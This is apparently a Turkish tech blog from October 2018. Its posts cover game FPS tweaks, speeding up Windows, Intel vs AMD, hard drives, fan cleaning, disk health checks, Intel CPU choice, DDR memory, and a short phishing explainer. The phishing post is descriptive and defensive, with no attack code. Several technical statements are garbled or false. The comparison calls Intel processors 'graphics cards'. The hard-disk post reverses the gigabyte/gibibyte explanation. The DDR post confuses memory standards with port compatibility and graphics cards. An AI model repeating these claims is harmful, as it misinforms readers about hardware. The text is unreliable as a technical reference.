Black Hat

Theme Blogspot version Blackhat Indonesia

Black Hat

Theme Blogspot version Blackhat Indonesia

Black Hat

Theme Blogspot version Blackhat Indonesia

15 Ekim 2018 Pazartesi

Oyunlarda FPS Nasıl Artar?

Konsolların aksine, PC için satışa çıkan oyunlar fazla optimize edilmiyor ve bu da oyunseverlerin canını sıkıyor. FPS sorunları hemen hemen her yapımda karşımıza çıkarken, bu yazıda bazı ipuçları vereceğiz. Oyunlarda FPS nasıl artırılır?

Ekran kartı sürücüleri önemli
Eski sürücülerle oyun oynamak pek akıllıca değil. Ekran kartınızdan üst düzey performans almak istiyorsanız, ilk yapmanız gereken şey son çıkan driverları bilgisayarınıza yüklemek. Bunun için AMD veya Nvidia’nın resmi sitelerini ziyaret edebilir, sürücü sürümünüzün güncelliğini kontrol edebilirsiniz.

Oyun ayarlarını optimize edin
Çoğu masaüstü bilgisayarda doğal ekran çözünürlüğü 1920×1080, dizüstü bilgisayarda ise 1366×768 oluyor. Fakat FPS’yi artırmak için oyun oynarken bu doğal çözünürlüğü düşürmek gerekebilir.

Ekran çözünürlüğünü oyunlarda değiştirmek, FPS’yi de artırıp daha akıcı bir hale sokacaktır. Tabii aynı zamanda diğer ayarlarla da oynamak lazım. Örneğin, Anti Aliasing grafikleri yumuşatsa da, bilgisayar performansını düşürmektedir. Ek olarak gölge kullanımı da bilgisayarın oyun performansını ciddi anlamda etkiler. Bu iki özelliği azaltmaya veya kapatmaya özen gösterin.
Donanımlarınıza overclock yapın
Bunu herkese tavsiye etmiyoruz ama ne yaptığınızı, nasıl yapacağınızı biliyorsanız ekran kartınıza ve işlemcinize overclock yapmanız ciddi bir performans artışı sağlar.

Özellikle ekran kartına overclock yapmak doğrudan oyunlardaki FPS’ye etki ederken, bunun ayarlarını BIOS üzerinden yapabilirsiniz. Eğer donanımlarınız uyumluysa, overclock seçeneğini değerlendirin.

Optimizasyon yazılımları kullanın
Windows arka planında onlarca program çalışıyor ve bunlar bolca RAM ile işlemci tüketiyor. Çeşitli bilgisayar optimizasyon programları ise bu konuda kısıtlamalar getirerek PC performansını artırıyor. Özellikle Razor Cortex bu konuda epey işlevliyken, aynı zamanda geçici dosyalarınızı silip, sabit diskinizi birleştirerek de performans artırımı yapabilirsiniz.

Bir önceki yazımız olan En İyi Ücretsiz Adobe Illustrator Alternatifleri başlıklı makalemizde Adobe Illustrator alternatif program ve Adobe Illustrator alternatifi hakkında bilgiler verilmektedir.

Windows’u Hızlandırma Yöntemleri

PC’nizi daha etkili ve daha hızlı kullanabilmek ve bu anlamda iyi bir verim alabilmek için yapmanız gereken bir takım ayarlar vardır. Bu ayarlar sayesinde windows’u hızlandırma imkanınız var. bu haberimizde bu konu hakkında yapmanız gereken ayarları sizlere sıraladık.

Gereksiz Programları Kaldırma

Bilgisayarınızı açtığınız zaman daha önceden de yüklenmiş olan programlar arka planda çalışmaya başlayacaktır. Bu da bilgisayarınızın performansını önemli derece de etkileyecektir. Bunun için bilgisayar yöneticisini açık ve başlangıç sekmesine ıkladıktan sonra listede bulunan öğeleri bir bir inceliyorsunuz. İhtiyacınız olmayan her programı sağ tuşu tıklayarak devre dışında bırakabilirsiniz. Hatta kullanmadıklarınızı da kaldırmalısınız. Bu sayede bilgisayarınız daha hızlı açılır.

Görsel Efektler

Bilgisayarınızın görsel efektlerini kapatmalısınız. Pencereleri küçültüp büyütürken animasyonlar kullanırsanız bu performansını etkileyecektir. Başlat menüsüne performans yazıyorsunuz ve Windows performans seçeneği aramanıza çıkıyor. Burada en iyi performans için ayarla seçeneğini kullanabilirsiniz.

Güç Yönetimi

Bilgisayarınızın performansını etkileyen faktörlerden birisi de güç kullanımıdır. Bunun için Ayarlar > Sistem > Güç ve uyku yolunu izleyin. Dengeli kullanıp kullanmadığınızı buradan kontrol edebilirsiniz.

Gereksizleri Kaldırın

Program listenizde kullanmadığınız gereksiz olan her programı kaldırınız. İhtiyacınız olmayan programların bilgisayarınızda durmasının gereği yok.


Disk Temizliği

Sabit diskinizi arada bir temizlemelisiniz. Binlerce dosya birikince biraz temizlik yapmanız bilgisayarınıza nefes aldıracaktır. Bunun için başlat menüsüne disk temizleme yazın ve ekrana gelen verileri taratın.

Virüs Taraması

Bilgisayarınızı zaman zaman virüs taraması yapın. Özellikle de bilgisayarınız birden yavaşladıysa taramanın yardımı olabilir.

Yeniden Başlat

Bilgisayarınızı uzun süreden beri kapatmadıysanız o zaman yeniden başlatmalısınız. Bu sayede meydana gelmiş olan bazı sorunları da onarabilirsiniz.

Bir önceki yazımız olan Kablosuz Sanal Gerçeklik Geliyor başlıklı makalemizde Kablosuz Sanal Gerçeklik, wireless sanal gerçeklik ve wireless vr hakkında bilgiler verilmektedir.

14 Ekim 2018 Pazar

Intel vs AMD

Konu bilgisayar olunca akla gelen pek çok parça var fakat bunlardan en önemlisi şüphesiz işlemci. İşlemci cephesinde yıllardır AMD ve Intel arasında bitmek bilmeyen bir mücadele yaşanırken, Intel mi AMD mi, hangisi iyi sorusunu yanıtlayacağız.

Fiyat
Şüphesiz fiyat konusunda AMD daha ucuz ve en çok da bu yönüyle ön plana çıkıyor. Intel ve AMD çipsetler arasında ciddi fiyat farkları var ve daha uygun fiyatlı bir bilgisayar toplamak isteyenler için AMD her zaman ilk seçenek konumunda.

Buna rağmen çıktıktan sonra birkaç ay beklerseniz, Intel işlemciler de makul seviyeye geliyor.

Performans
Eğer fiyatı umursamıyorsanız ve tek amacınız performanssa, tavsiyemiz gözünüzü Intel’e çevirmeniz yönünde olacak. Her ne kadar AMD daha önceki yıllarda yaşanan kronik sorunlarını bir kenara atsa da, Intel hala en iyi seçenek.

Grafik
Eğer oyunlar için bir bilgisayar topluyorsanız, zaten harici bir ekran kartı almanız şart. İşlemciye entegre ekran kartları genellikle yüksek gereksinimli oyunları açamıyor fakat Intel bu konuda daha başarılı. Örneğin Overwatch’ı, ekran kartına gereksinim duymadan oynatabiliyor. Bu da önemli bir artı.

Overclock
Eğer yeni bir bilgisayar veya sadece işlemci alıyorsanız, ilk bakacağınız şey kutu üzerinde yazan saat hızları olacak. Eğer overclock yapacaksanız AMD bu konuda daha fazla seçenek sunuyor fakat Intel’in ekran kartları da kutudan daha yüksek saat hızlarıyla çıkıyor.

Sonuç olarak özetlersek, eğer para sizin için sorun değilse Intel ekran kartları her zaman birinci seçenek olmalı fakat bütçe dostu bir bilgisayar toplama derdindeyseniz, AMD’den de pişman olmayacaksınız.

Bir önceki yazımız olan Oyunlarda FPS Nasıl Artar? başlıklı makalemizde fps nasıl artar, oyun fps artırma ve Oyunlarda FPS Nasıl Artar hakkında bilgiler verilmektedir.

Sabit Diskiniz Hakkında Bilmeniz Gerekenler


Bilgisayarızın ana depolama aygıtı olan sabit diskiniz, bilgisayarınızın en kritik noktalarından şüphesiz ki bir tanesi. Bu yazımızda da depolama aygıtınız ile ilgili olarak bilmek isteyeceğinizi düşündüğümüz her şeyi sizlere açıklıyoruz.

SABİT DİSK NEDİR?
Sabit disk (uzun adıyla sabit disk sürücüsü veya kısaca HDD) bilgisayarınızın en temel yığın depolama alanıdır. Bilgisayarınıza bir dosya kopyaladığınızda o dosya burada yerini alır. Çoğu sabit disk sürücüsü, tozun hassas bileşenlere ulaşmasını önleyen sağlam bir haznenin içinde konumlandırılmış manyetize edilmiş bir disk, yüksek hızlı bir motor ve okuma/yazma kafası içerir.

DEPOLAMA VE BELLEK ARASINDAKİ FARK NEDİR?
Bilgisayarınızın belleği (RAM) kısa vadelidir. Bellek son derece hızlı olmakla beraber geçicidir. Bilgisayara giden elektriği kestiğinizde bellekteki her şey kaybolur. Depolamaya gelirsek; sabit disk, USB flash disk, SD kart veya DVD gibi ortamlar sürekli olarak güce ihtiyaç duymazlar. Siz bir daha kullanana kadar, üzerindeki veriler oldukları yerde kalırlar. Depolama asla bellek kadar hızlı olmasa da geçmiş yıllara göre artık çok daha hızlı. Geçmişte dosyalarını diskete kaydeden birilerini tanıyorsanız hızını sorabilirsiniz.

USB SABİT DİSKLER FARKLI MIDIR?
USB sabit diskler dâhili sabit disklerle neredeyse aynıdır. Hatta birçok harici sabit sürü aynı bileşenlere sahiptir: plastik bir muhafazaya vidalanmış bir sabit sürücü. Tek fark arabirimdir: Harici sürücünüzün bağlantısının makinenizin dışından yapılmasını sağlayan bazı elektronik bileşenleri vardır. Bu süreç ve USB arabiriminin dâhili bir sabit sürücü arabiriminden yavaş olması, harici sürücülerin daha hantal olduğu anlamına gelir.

DAHA İYİ BİR ŞEY VAR MI?

Geleneksel sabit sürücülerin bir sonraki adımı SSD’ler. Erişim süresi (okuma kafasının dönerek bir sabit sürücüde istenen yere ulaşma süresi) olmadığından SSD’ler genelde geleneksel sabit sürücülerden çok daha hızlıdır. Ancak SSD’lerin karmaşık tasarımı fiyatlarının çok daha yüksek olmasına sebep oluyor ve henüz SSD’lerin getirileri fiyatlarıyla eşdeğer değil.

SABİT DİSKİMİ DOLDURMAK PC’Mİ YAVAŞLATIR MI?

Sabit diskinizde dosya depolamak bilgisayarınızı yavaşlatmaz. Ne de olsa bu onun işi. Ancak çok fazla dosya depoladığınızda durum değişir. Windows, ek bellek olarak bir miktar sabit disk alanını kullanır. Sabit sürücünüz kapasitesini doldurma eşiğine geldiğinde bu biraz yavaşlama yaşamanıza sebep olabilir çünkü bu noktada Windows, sorunsuz çalışmak için gerekli olan boş alanı bulamayacaktır.

SABİT DİSKİM ÇOK HIZLI DOLUYOR. NEDEN OLABİLİR?

Yazılım açısından neler olduğunu bilmeden bu soruyu cevaplamak zor. Birkaç program, sürücünüze geçici dosyalar yazıp bunları düzgün bir şekilde temizlemiyor olabilir. Diğer yandan sürücünüz birçok küçük dosyayla dolmuş olabilir ve Windows’un çalışma şekli dolayısıyla bunlar küçük dosya boyutlarının aksine daha fazla yer işgal ediyor olabilir. Daha da olası bir ihtimal, sürücünüze birçok fotoğraf, video ve uygulamanın yığılmış olmasıdır.

500 GB’LİK SABİT DİSKİM NEDEN 467 GB GÖRÜNÜYOR?

Korkmayın, kazıklanmadınız. Sabit disk üreticileri genelde 1 gigabaytı 1.000 megabayt olarak ele alırlar; ancak Windows 1 gigabaytı 1.024 megabayt olarak yorumlar. Farkın sebebi budur. Bunun sebebi gigabaytların 2 tabanına göre hesaplanmasının gerekmesidir. Disk üreticileri tarafından GB denilen veri miktarı aslında “gibibayt”tır. Bu konuda yapılan hukuki müdahaleler sayesinde bugün yeni bir sabit disk aldığınızda genelde kutunun üzerinde boş alanla ilgili bir feragatname görürsünüz.

NASIL DAHA FAZLA ALAN EDİNEBİLİRİM?

Bunun en kolay yolu ilave sürücü eklemek. Bir masaüstü PC söz konusu olduğunda SATA arabirimli bir sürücüye ve bunu bağlamak için doğru kablolara (Genelde ürünle birlikte gelir.) ihtiyacınız olacaktır. SATA sürücüleri “tak ve çalıştır” yöntemiyle kullanılır. Sürücüyü taktığınızda Windows, herhangi bir ayar yapmanıza gerek kalmadan sürücüyü görecektir. Ayrıca kasayı açmadan ek depolama sağlamak için harici bir USB sürücü de takabilirsiniz. Bir dizüstü bilgisayarınız varsa bu daha ideal bir seçenektir.

DİZÜSTÜMDEKİ DİSKİ NASIL DEĞİŞTİREBİLİRİM?

Öncelikle eskisinin yerine kullanacağınız bir sabit diske ihtiyacınız olacak. Dizüstü sürücüsü aldığınızdan emin olun. Bunlar masaüstü sürücülerinden daha küçüktür. Ayrıca bunun dizüstü bilgisayarınızla uyumlu olduğundan emin olun. Ek olarak, dosyalarınızı yedeklemek için büyük bir harici diske, işletim sistemini yüklemek Windows DVD’sine, tornavidaya ve dizüstü bilgisayarınızı sökmek için bol cesarete ihtiyacınız olacaktır.

Bir önceki yazımız olan Daha Sessiz Bir bilgisayar İçin : Fan Temizliği başlıklı makalemizde bilgisayar temizliği, bilgisayarımdan ses geliyor ve fan temizliği hakkında bilgiler verilmektedir.

13 Ekim 2018 Cumartesi

Daha Sessiz Bir bilgisayar İçin : Fan Temizliği



Normal şartlarda, çalışan bir masaüstü bilgisayarın birkaç metre kadar uzağındaysanız kulağınıza hiçbir ses gelmemesi gerekiyor; fakat fanla soğutulan düzenekler için sonsuza dek sessizlik diye bir şey söz konusu olamaz. Tüm fanlı ürünler için aynı durum söz konusu. Kullandığınız fanların kalitesi veya dönüş hızı gibi değerleri bir ölçüde tozlanmayı geciktirebilir ancak hangisi olursa olsun tüm fanlar havayla temas ettiği sürece günün birinde tozlanma nedeniyle gürültü üreteci hâline gelecektir. Değinmek istediğimiz asıl nokta, düzenli olarak fan temizliği ve bakımları yapılan her bilgisayarın sessiz olabileceği. Gelişigüzel satın alınmış fanlara sahipseniz aslında eğlenceli sayılabilecek olan temizlik işinin periyodu biraz daha artacak, o kadar. İşin işten geçtiği durumlardaysa ne yazık ki yeni fanlar satın almak dışında bir çıkış yolu kalmıyor.

Kasanızdaki fanları tanıyın

Standart bir bilgisayar kasasını ele alacak olursak en az üç farklı fanın varlığından bahsedebiliriz. Bunlardan ilki hiç şüphesiz işlemci fanı. Kasayı açtığınızda dikkatinizi ilk bakışta çekmeyebilir ama güç kaynakları da bir fan yardımıyla serinletiliyor. Bol miktarda sunulma olasılığı en yüksek olan fan ise kasaya yerleşik olanlar. Kasa fanları yüksek olasılıkla işlemci fanına yakın ve arka kısımda bulunuyor. Biraz daha iyi bir kasaya sahipseniz ön tarafta ve yan kapakta da sizi bekleyenler olacak. Üst seviye kasalardaysa fan sayı- sı hayli fazla olabilir. Korkmamız gerekenler, içeriye hava çekmekle görevli olanlar. Fanınızın gürültüsünü azaltmak istiyorsanız öncelikle overclock’a dair ayarlar yapmışsanız geri alın. Overclock sonrasında işlemci daha fazla ısınacağından fan daha hızlı dönmek durumunda kalacak, böylece tozlanmaya ve gürültü üretmeye daha yatkın olacak. AMD ve Intel’in işlemci kutusundan gelen stok fanları zaten gürültü kaynağı olmak konusunda meşhurlar. Bu nedenle kullanıcıların tercih listesinde ilk sırada daha iyi bir işlemci fanı geliyor. Fanınızın markası veya modeli fark etmiyor, basit bir temizlik işleminden sonra çok daha performanslı ve sessiz çalışacağına emin olabilirsiniz. Gürültüye neden olan fanlarınızı en başta durdurma yöntemiyle araştırmakta fayda var. Bilgisayar çalışırken ilk etapta işlemci fanını bir süreliğine durdurun. Korkmayın, siz bıraktıktan kısa bir süre sonra çalışmaya devam edecektir. Eğer ses kesiliyorsa işlemci fanı mutlaka temizlenmeli. Kasa fanlarına da aynı yöntemi uygulayın. Fakat kasa fanları nispeten daha az gürültü üreten fanlardır, çünkü çapları geniş. Tespitleri yaparken rüzgâr sesi ve horuldamayı birbirine karıştırmamakta fayda var. Horuldama sesi genelde fanlar soğukken yüksek bir gürültü olarak belirir ve bir süre sonra belirgin şekilde azalır, ancak yine de hissedilir. Eğer işlemci ve kasa fanlarında bir sorun yoksa en zor kısım olan güç kaynağı fanını ele almalısınız. Güç kaynakları için en az iki yıllık garanti süresi bulunuyor. Firma daha fazlasını da sağlayabilir. Kontrol etmenizde fayda var çünkü temizlik için mutlaka güç kayna- ğının içini açıp fanı çıkarmak gerekiyor ki bu da garantinin geçersiz olması demek. Eski güç kaynaklarında arka tarafa bakan 80 mm boyutlarında bir fan bulunuyor. Yeni nesil ürünlerdeyse 120 mm veya daha yüksek fanlar bulunabiliyor ama güç kaynaklarının kasada altta konumlandı- rılmaya başlanması nedeniyle tozla daha erken bir zamanda tanışabiliyorlar. Kasa fanları, değiştirilme maliyeti açı- sından en kolay sıyrılabilenlerin başında. Benzer şekilde temizlikleri ve sökü- lüp takılabilmeleri de daha kolay. Kasanızın içinde kısa bir keşfe çıkarak kaç fan bulunduğunu öğrenebilirsiniz. Biraz önce de bahsettiğimiz gibi, öncelikle kasanızın arka kısmına bakın. Arka ve üstte bulunan fanlar kasanın içinden dışarıya hava göndermekle görevli oldukları için oldukça az tozlanırlar, ancak pek de temiz olmayan bir kasanız varsa tozdan etkilenme olasılıkları yine de yüksek. Asıl olarak yönelmeniz gerekenler içeriye hava çeken ön fan ve yan kapak fanı. Toz filtresi sunmayan kasalar ne yazık ki bir süre sonra fanların içeriye toz doldurmasına neden oluyor. Elbette çalışma ortamınızın temizliğinin de düzenli olarak yapılıyor olduğunu varsayıyoruz.

Temizleme yöntemleri

Temizlik için öncelikle kasanızın içindeki tüm tozları bir elektrik süpürgesi yardı- mıyla çekmelisiniz. Araya dereye karışan tozlar için bir fırça kullanabilirsiniz. Hatta tüy bırakmayan kuru bezlerle parçaları sökmeden üstlerini de silebilirsiniz. Oldukça iyi bir başlangıç olacaktır. Sonrasında bahsettiğimiz tüm fanları sökün. Yı- kama, fırçalama, yağlama ve kompresörle temizleme gibi birçok yöntemimiz var. Yine işlemci fanından başlıyoruz. Fan ve soğutucu metal yapısı neredeyse tüm modellerde birbirinden ayrılabilen yapıda. Fanı kesinlikle sıvıdan uzak tutmak gerekiyor, soğutucu metali ise suyun altında dilediğiniz gibi yıkayabilirsiniz. Montaj öncesinde tabandaki macun kalıntılarını ve varsa sudan kaynaklanan kireç kalıntılarını temizleyin ki işlemciniz eskisinden daha iyi şekilde serinlesin. Eğer söküp takma ve yıkama gibi işlerle uğraşmak istemiyorsanız yöntemlerden bir diğeri de fırçalamak. Basit bir fır- çayla -eski bir diş fırçası da olabilir- fanı- nızın, soğutucu metal yapının her yerini fırçalayın. Metal yapıyı yere vurarak tozlarını dökebilir ve aralara üfleyerek tozların daha iyi çıkmasını sağlayabilirsiniz. Üflemek demişken, elbette bu işte kimse kompresörlerin eline su dökemez. Piyasada satılan uygun fiyatlı kompresörlerden daimi bir tane bulundurmak da mantıklı olabilir. Birçok bölgenin temizliğinde -bilgisayar dışında da- işe yarıyor. Hatta oto yıkama işi yapan yerlere birkaç dakika boyunca fanlarınıza hava tutmasını bile rica edebilirsiniz. Güç kaynakları da aslında içerilerinde birer kasa fanı bulunduruyorlar. Güç kaynağınızın markasına ve modeline göre bile değişiklik gösterebilirler. Güç kaynağınızın içini açmadan, yani garantisini sona erdirmeden iyi bir temizlik yapabilmeniz mümkün değil. Yine de hava kompresörü yardımıyla gürültünün uzun bir süre için üstesinden gelebilirsiniz. Mil yataklarını yağlama gibi bir durumsa içi açılamayan ürünler için geçerli değil. İçini açabiliyorsanız, o hâlde kasa fanı için bahsedeceğimiz adımları izleyin. Biraz önce de bahsettiğimiz gibi, güç kaynakları yeni nesil kasalarda yerden doğrudan toz çekiyor ve kasanız toz filtresi sunmuyorsa vay hâlinize! Sonradan eklemeniz şart. Neyse ki birçok fan boyutu için toz filtresi sunuluyor.

Kasa fanlarında dikkat çeken ilk detay tozların artık yağlanmış gibi bir arada bulunmasıdır. Temizlikten sonra eğer yapabiliyorsanız kasanızın içine taze hava çeken fanlar için toz filtreleri edinmeye çalı- şın. Eğer toz filtreleriniz varsa mutlaka temizleyin. Temiz bir kasanın içinde işlemci fanı ve diğer fanların da tozdan uzak kalma süresi artacaktır. Yaprakları ve çer- çeveyi bez yardımıyla temizleyebilirsiniz. Motor bölgesi için mutlaka fırça kullanmalısınız. Eğer kompresör şansınız varsa en iyi seçenek bu olacaktır. Sonrasında motor bölgesine birkaç damla makine yağı göndermeyi unutmayın.

Gürültü Engelleyen Ek Ürünler

Toz filtreleri çok da pahalı ürünler değiller. En azından temizlik periyodunu iki kat uzatabilirler. 120 mm’lik bir toz filtresini yaklaşık 15 TL’ye edinebilirsiniz. Daha makul fiyatlı çözümler de var. Hatta renkli olan bazı seçeneklerle kasanıza daha çekici bir görünüm kazandırabilmeniz de mümkün. Kasanızın gövdesinde filtre için bir oluk bulunmasa bile fan çerçevenizle kasanız arasındaki aynı vida deliklerini kullanarak filtrenin montajını sağlayabilirsiniz. Yıldız tornavida dışında ihtiyaç duyabileceğiniz hiçbir şey yok.

Titreşim emici vidalar da özellikle kasa fanları için büyük önem taşıyor. Dörtlü olarak satılan modelleri 5 TL seviyesinde edinebilirsiniz. Böylece çelik vidalar kullanmanıza gerek kalmıyor. Fanları sö- küp takmanız kolaylaştığı gibi, ortaya çı- kabilecek olası uğultuları da en az seviyeye indirmiş oluyorsunuz. Renkli modellerle yine kasanıza çekicilik katma şansı- nız var. Ayrıca UV duyarlı olanları da var. Modifikasyona meraklıysanız UV aydınlatıcı altında müthiş şekilde parlayacağına emin olabilirsiniz. Kasa fanları için çözümlerden bir diğeri de titreşim emici çerçevelerden kullanmak. Titreşim emici çerçeveler tıpkı bir musluk contası gibi kasanız ve fan çer- çevenizin arasına takılıyor. Vidalama işlemini yaparken arada kalıyor ve fan çerçevesinin kasaya değmesini engelliyor. Çok yüksek devirli fanlar için titreşim emici vidaları kullanmanız daha mantıklı bir çö- züm olabilir. Vidalar sarsıntıyı da emme özelliğine sahip oluyorlar. Kasa içindeki kabloları toplamak da oldukça mühim. Dağınık kablolar ve uçtaki plastik bağlantılar kasanızın metal yüzeyine değerek ses üretebilir. Makaron veya kelepçe gibi özel çözümler var ama çoğu zaman bir paket lastiğinden bile destek alabilirsiniz. Görüntüsü de hoş olsun diyorsanız set şeklinde 5 TL civarına bulabileceğiniz UV duyarlı kelepçeler de var. Birçok farklı renkte tercih edilebiliyorlar. Kabloları toplamanın bir diğer avantajı da kasa içi hava dolaşımını kolaylaştırmak. Daha kolay hava dolaşımı donanımların serinlemesini artıracak ve böylece fanlar daha az dönmeye ihtiyaç duyacak. Mekanik aksama sahip olan sabit diskler de ister istemez gürültüye neden oluyor. Piyasada sabit disklerin titreşimini emecek çözümler de var. Yine de iyi monte edilmiş bir sabit disk yeterli gelecektir. Fazla abartmamak gerekebilir.

Harddisk Bozuk Mu? Nasıl Anlarım?

Bilgisayar donanımları içerisinde veri güvenliği açısından en çok ön planda olması gereken donanımları sıralayacak olursak bunların başında kuşkusuz ki harddisk gelir. Bilgisayarımızın hemen hemen tüm verilerini içerisinde barındıran ve her ne olursa olsun herhangi bir sorunda en çok sıkıntıyı bizlere yaşatacak olan donanım parçalarından birisi durumunda. Baktığımız zaman son dönemlerde bilgisayarlar yeni dahi olsa meydana gelen harddisk sorunları insanlara ciddi anlamda sıkıntı yaratıyor diyebilmekteyiz. Bu nedenle harddisk güvenliği her şeyden önce tutulması gereken unsurlardan birisi durumunda.

Harddisk bozuk mu, nasıl anlarım? Son dönemlerde bu tip sıkıntıların çözümü safhasında çok daha hızlı bir şekilde çözümler üretebilmek için yeni nesil yazılımlar işlerimizi kolaylaştırıyor. Bir donanımın bozuk olup olmadığını artık doğrudan anlayabilme şansına sahip olduğumuzdan dolayı bazı önemli detayları sizlere sunacak ve fikir edinmenize de yardımcı olacağız. Küçük bir program ile bu sorunun kökten çözümü için hızlı adımlar atabilme şansına sahip olacaksınız.
Harddisk

HDTune isimli programı TRİAL SÜRÜM olarak indirin ve bilgisayarınıza kurun.
Kurulumun ardından programı çalıştırın ve karşınıza ilk olarak BENCHMARK sekmesi gelecek.
En yukarıda da bilgisayarınızda kaç adet harddisk takılı ise onları göreceksiniz.
Tek bir harddisk takılı ise sadece onun adı gelecektir.
Sağ alt köşede START butonuna tıklıyoruz. Sistem, harddiski taramaya başlıyor.
Daha sonra üst sekmelerden HEALTH kısmını seçiyoruz.
Burada sıkıntılı alanları bize gösterecek. Kırmızı renkte FAİLED yazan uyarılar var ise hemen harddiskinizi yedekleyin ve değiştirin.
Sarı alanlar, üzerinde durulması gereken ancak küçük çaplı sorunlar demektir.


12 Ekim 2018 Cuma

İntel İşlemcilerden Hangisi Alınmalı?

Günümüzün en iyi işlemci üreticilerinden birisi olan İntel, yeni nesil teknolojiler ile birlikte insanları buluşturarak bilgisayarların çok daha performanslı bir şekilde çalışmasına imkan tanıyor diyebilmekteyiz. Birkaç sene içerisinde ortaya çıkan yeni teknolojiler ile birlikte bilgisayarların çok dkaha önemli bir performans değerine ulaştığını söyleyebilmek de mümkün hale geldi. İşlemci, bilgisayarın en önemli parçalarından birisi olarak dikkat çeker ve günümüzde işlemci sektöründe özellikle AMD ve İntel birbirleri ile inanılmaz bir yarışın içerisine girmiştir. Ancak İntel yılların deneyimi ile her zaman adım daha önde yer alır.

En iyi İntel işlemciler özellikle son 5 sene içerisinde ortaya çıkarıldı ve günümüzün en etkileyici içeriklerinden birisi olarak da dikkat çekti. Türkiye, her geçen gün çok daha fazla bilgisayara eğilim gösteren ülkelerden birisi durumunda ve artık her evde bir bilgisayar mevcut. Günümüzde İntel markasının üretmiş olduğu eski nesil işlemcileri kullanan bilgisayarların dahi hala satıldığını görebilme şansına sahip olabilirsiniz. İşte bu durum markanın ürünlerinde ki inanılmaz kaliteyi bizlere sunuyor diyebiliriz.
İntel İşlemci

İntel Core İ7 işlemci, günümüzün en kaliteli ve en çok tercih edilen işlemci modellerinden birisi olarak dikkat çekiyor. İ3 ile başlayan ve sonrasında İ5 ve İ7 sürümlerinin çıkarıldığı bu segmentte çok kaliteli bir bilgisayar deneyimi sizleri bekliyor. 4 ve 8 çekirdek seçenekleri ile kullanılabilen ve bilgisayarlarınızda mükemmel bir deneyimi sizlere sunan bu büyük marka, zaman içerisinde çok daha geniş kitlelere ulaşmışptır ve günümüz sunucularında da olmazsa olmaz parçalardan birisi haline gelmiştir.

İntel markasından işlemci alacaksanız ve bu yeni nesil bir işlemci olacak ise en kötü ihtimal ile İntel Core İ3 işlemci almanız sizlere çok daha iyi seçenekler sunar. En iyi ihtimal ile İ7 işlemci alarak bilgisayarınızı performans anlamında doruk noktalara çıkarabilir ve verim alabilirsiniz. Günümüzde Celeron model işlemciler hala satılmakta ancak kesinlikle tercih edilmemelidir.

DDR Nedir

Bilgisayar donanımları ile alakalı olarak bilgi sahibi olmayan ancak fikir edinmek isteyen birçok insan var. Anakart, bildiğimiz gibi bir bilgisayarın tüm donanımlarının işlevsel olarak çalışmasına imkan sunan sistemlerden birisi olarak dikkat çekiyor. Zaman içerisinde yazılımsal farklılıkların yaşanması, yeni sürüm donanımların çıkması ile birlikte eski mantıkta ki donanım modelleri çok da fazla kullanılmamaya başlandı. Bu tip donanım geliştirmelerinden sonra birkaç zaman içerisinde DDR mantığı ortaya çıktı ve bu konu ile alakalı olarak bilgisayardan anlamak isteyen ve yorum yapabilme çabası içerisinde olan birçok insan.

Her marka kendi çapında gelişmiş donanımlar üretir ancak bu donanımların anakart sistemleri ile uyumlu olması da bir o kadar önemlidir. Tabi ki bu donanımların uyumlu bir şekilde geliştirilebilmesi için bir mantık olmalıdır ve bu mantık DDR sistemi ile ortaya çıkarılmıştır. Bu terim, anakartların donanımlar ile uyumluluklarını bir nevi ortaya koyan terimlerden birisidir. Donanımlar ile anakartların DDR numaraları uyuyorsa port anlamında herhangi bir uyumsuzluk kati surette yaşanmaz.

DDR

Günümüzde aktif olarak kullanılan DDR3 modeli bulunur. Yeni nesil bilgisayarlar yavaş yavaş DDR5 mantığına adapte olmaya çalışmaktalar ancak hala stabil olarak çalışmadığından dolayı en güvenilir moden olan DDR3 sürümü tercih edilir. DDR3 bir sistemde DD5 RAM kullanamazsınız. İşte bu tip donanım uyuşmazlıklarının da önüne geçilebilmesi açısından önemli bir sistemdir. Bu sistem aslında bir nevi protokol olarak da nitelendirilebilir. ANakart üzerinde ki slotlar DDR mantığının gerektiğince yapılır ve donanım girişleri de buna göre hazırlanır.

DDR mantığı ile birlikte zaman içerisinde donanım uyuşmazlıkları ortadan kalktı. ANcak ekran kartı için DDR mantığı çok da fazla bir şey ifade etmez. Örnek olarak DDR3 bir sisteme DDR5 ekran kartı takılabilir ancak her ne olursa olsun anakartın desteklemesi son derece önemlidir. Anakart bunu desteklemiyor ise çok büyük sıkıntılar meydana gelebilir.

11 Ekim 2018 Perşembe

phishing nedir



Phishing  Nedir ?
Merhaba arkadaşlar. Bugün phishing sanatının ne olduğunu anlatacağım. Phishing sanatı türkçe karşılığı olarak oltalama veya yemleme sanatı olarak da bilinir. Phishing aslında bir saldırı yöntemidir. Genellikle insanları kandırarak verilerini, bilgilerini veya şifrelerini çalmak amaçlı kullanılır. Ama yaygın olarak insanların şifrelerini çalmaya yöneliktir. Eğer dikkat etmezsek banka şifrelerimiz, e post şifrelerimiz ve diğer şifrelerimiz çalınabilir. Genel olarak çalışma mantığı şu şekildedir;

Bir web sitesini klonlayarak yani aynı şeklini yaparak sadece urlsini değiştirerek insanları tuzağa düşürüyorlar. Bu klon web sitelerini gerçek sitelerden ayırmanın birkaç yolu vardır. Bunların başında sitenin url adresine dikkat etmek geliyor. Bundan dolayı girdiğiniz sitelerin resmi site urlsi olduğuna dikkat edin. Bir diğeri ise yanlış kullanıcı adı ve şifre girsek bile doğru olarak kabul eder. Buradan da ayır edebiliriz.

Phishing Saldırıları İle Neler Çalınır ?
Phishing yöntemi kullanarak bilgisayar kullanıcılarını tuzaklarına düşüren dolandırıcılar özellikle aşağıda belirtilen işlemleri çalıyorlar
1. Kredi, Debit/ATM Kart Numaraları/CVV2
2. Şifreler ve Parolalar
3. Hesap Numaraları
4. İnternet Bankacılığına Girişte Kullanılan Kullanıcı Kodu ve Şifreleri

E Posta Yolu İle Phishing Saldırıları ?

Phishing saldırıları genellikle e-posta yolu ile yapılır. Size klon sitenin adresini gönderirler ve altına da resmi sitenin yazdığı bir yazıymış gibi bir yazı yazarlar ve size e-posta yollarlar. Size yolladıkları e-postadaki linke tıkladığınızda sizin bir takım bilgileriniz gider. Eğer o linkten giriş yaptığınızda ise hesap bilgileriniz gider. Ve böylelikle hesaplarınız çalınabilir. Eğer banka hesabınıza giriş yaptıysanız banka hesabınız, içindeki paralar vs vs her şeyiniz elinizden gider.

